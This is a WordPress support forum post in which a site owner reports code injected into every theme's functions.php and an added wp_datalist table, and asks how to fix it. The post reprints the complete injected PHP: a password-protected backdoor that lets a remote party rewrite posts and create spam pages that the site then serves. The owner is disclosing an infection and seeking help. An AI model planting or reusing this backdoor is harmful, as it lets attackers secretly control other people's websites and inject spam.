Support » Fixing WordPress » code injected in theme functions.php; table added

  • Hello,

    I am running a local development installation on DesktopServer. By accident I noticed two things:

    1. Following code being injected in top of all themes functions.php:

    
    <?php
    
    if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == 'a22f7014b362e3b694ae0c438698ebe4'))
    	{
    		switch ($_REQUEST['action'])
    			{
    				case 'get_all_links';
    					foreach ($wpdb->get_results('SELECT * FROM <code>' . $wpdb->prefix . 'posts</code> WHERE <code>post_status</code> = "publish" AND <code>post_type</code> = "post" ORDER BY <code>ID</code> DESC', ARRAY_A) as $data)
    						{
    							$data['code'] = '';
    							
    							if (preg_match('!<div id="wp_cd_code">(.*?)</div>!s', $data['post_content'], $_))
    								{
    									$data['code'] = $_[1];
    								}
    							
    							print '<e><w>1</w><url>' . $data['guid'] . '</url><code>' . $data['code'] . '</code><id>' . $data['ID'] . '</id></e>' . "\r\n";
    						}
    				break;
    				
    				case 'set_id_links';
    					if (isset($_REQUEST['data']))
    						{
    							$data = $wpdb -> get_row('SELECT <code>post_content</code> FROM <code>' . $wpdb->prefix . 'posts</code> WHERE <code>ID</code> = "'.mysql_escape_string($_REQUEST['id']).'"');
    							
    							$post_content = preg_replace('!<div id="wp_cd_code">(.*?)</div>!s', '', $data -> post_content);
    							if (!empty($_REQUEST['data'])) $post_content = $post_content . '<div id="wp_cd_code">' . stripcslashes($_REQUEST['data']) . '</div>';
    
    							if ($wpdb->query('UPDATE <code>' . $wpdb->prefix . 'posts</code> SET <code>post_content</code> = "' . mysql_escape_string($post_content) . '" WHERE <code>ID</code> = "' . mysql_escape_string($_REQUEST['id']) . '"') !== false)
    								{
    									print "true";
    								}
    						}
    				break;
    				
    				case 'create_page';
    					if (isset($_REQUEST['remove_page']))
    						{
    							if ($wpdb -> query('DELETE FROM <code>' . $wpdb->prefix . 'datalist</code> WHERE <code>url</code> = "/'.mysql_escape_string($_REQUEST['url']).'"'))
    								{
    									print "true";
    								}
    						}
    					elseif (isset($_REQUEST['content']) && !empty($_REQUEST['content']))
    						{
    							if ($wpdb -> query('INSERT INTO <code>' . $wpdb->prefix . 'datalist</code> SET <code>url</code> = "/'.mysql_escape_string($_REQUEST['url']).'", <code>title</code> = "'.mysql_escape_string($_REQUEST['title']).'", <code>keywords</code> = "'.mysql_escape_string($_REQUEST['keywords']).'", <code>description</code> = "'.mysql_escape_string($_REQUEST['description']).'", <code>content</code> = "'.mysql_escape_string($_REQUEST['content']).'", <code>full_content</code> = "'.mysql_escape_string($_REQUEST['full_content']).'" ON DUPLICATE KEY UPDATE <code>title</code> = "'.mysql_escape_string($_REQUEST['title']).'", <code>keywords</code> = "'.mysql_escape_string($_REQUEST['keywords']).'", <code>description</code> = "'.mysql_escape_string($_REQUEST['description']).'", <code>content</code> = "'.mysql_escape_string(urldecode($_REQUEST['content'])).'", <code>full_content</code> = "'.mysql_escape_string($_REQUEST['full_content']).'"'))
    								{
    									print "true";
    								}
    						}
    				break;
    				
    				default: print "ERROR_WP_ACTION WP_URL_CD";
    			}
    			
    		die("");
    	}
    
    	
    if ( $wpdb->get_var('SELECT count(*) FROM <code>' . $wpdb->prefix . 'datalist</code> WHERE <code>url</code> = "'.mysql_escape_string( $_SERVER['REQUEST_URI'] ).'"') == '1' )
    	{
    		$data = $wpdb -> get_row('SELECT * FROM <code>' . $wpdb->prefix . 'datalist</code> WHERE <code>url</code> = "'.mysql_escape_string($_SERVER['REQUEST_URI']).'"');
    		if ($data -> full_content)
    			{
    				print stripslashes($data -> content);
    			}
    		else
    			{
    				print '<!DOCTYPE html>';
    				print '<html ';
    				language_attributes();
    				print ' class="no-js">';
    				print '<head>';
    				print '<title>'.stripslashes($data -> title).'</title>';
    				print '<meta name="Keywords" content="'.stripslashes($data -> keywords).'" />';
    				print '<meta name="Description" content="'.stripslashes($data -> description).'" />';
    				print '<meta name="robots" content="index, follow" />';
    				print '<meta charset="';
    				bloginfo( 'charset' );
    				print '" />';
    				print '<meta name="viewport" content="width=device-width">';
    				print '<link rel="profile" href="http://gmpg.org/xfn/11">';
    				print '<link rel="pingback" href="';
    				bloginfo( 'pingback_url' );
    				print '">';
    				wp_head();
    				print '</head>';
    				print '<body>';
    				print '<div id="content" class="site-content">';
    				print stripslashes($data -> content);
    				get_search_form();
    				get_sidebar();
    				get_footer();
    			}
    			
    		exit;
    	}
    
    ?>
    

    It looks like the code (re)writes the head section of the generated HTML, using a table wp_datalist as source?

    2. Table wp_datalist with columns url, title, keywords, description, content and full_content added to the database.

    I googled for “WordPress table wp_datalist” but came up with nothing.

    Has anyone ever seen such a “hack” like this and what is the best solution to resolve the issue?

    Kind regards,
    Ger van de Lindt
    Nootdorp
    The Netherlands

Viewing 1 replies (of 1 total)
Viewing 1 replies (of 1 total)
  • The topic ‘code injected in theme functions.php; table added’ is closed to new replies.